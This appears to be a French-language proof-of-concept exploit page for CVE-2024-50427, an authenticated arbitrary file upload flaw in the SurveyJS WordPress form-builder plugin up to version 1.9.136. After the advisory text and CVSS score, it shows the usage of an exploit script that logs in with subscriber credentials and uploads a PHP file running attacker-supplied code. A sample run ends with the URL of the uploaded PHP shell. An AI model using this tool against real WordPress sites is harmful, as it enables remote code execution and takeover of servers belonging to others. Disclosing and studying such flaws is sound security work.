
SurveyJS : Constructeur de formulaires WordPress par glisser-déposer <= 1.9.136 - Authentifié (Abonné+) Téléversement arbitraire de fichiers
SurveyJS : Constructeur de formulaires WordPress par glisser‑déposer <= 1.9.136 - Téléchargement arbitraire de fichiers authentifié (Subscriber+)
Le plugin SurveyJS : Constructeur de formulaires WordPress par glisser‑déposer pour créer, styliser et intégrer plusieurs formulaires de toute complexité pour WordPress est vulnérable aux téléchargements arbitraires de fichiers en raison de l’absence de validation du type de fichier dans toutes les versions jusqu’à la version 1.9.136 incluse. Cela permet à des attaquants authentifiés, ayant au moins un accès de niveau Abonné (Subscriber), de télécharger des fichiers arbitraires sur le serveur du site affecté, ce qui peut permettre l’exécution de code à distance.
Published: 2024-10-24 00:00:00
CVE: CVE-2024-50427
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 8.8
Slugs: surveyjs
usage: CVE-2024-50427.py [-h] [--code CODE] url username password
Upload a PHP file to a WordPress site.
positional arguments:
url L'URL du site WordPress (ex. http://example.com)
username Votre nom d'utilisateur WordPress
password Votre mot de passe WordPress
options:
-h, --help Affiche ce message d'aide et quitte
--code CODE Code PHP à exécuter
$ python3 CVE-2024-50427.py http://kubernetes.docker.internal [email protected] user --code "phpinfo();"
Login successful.
File uploaded successfully.
http://kubernetes.docker.internal/wp-content/uploads/surveyjs/158718452672e02bd1d7212.25114025.php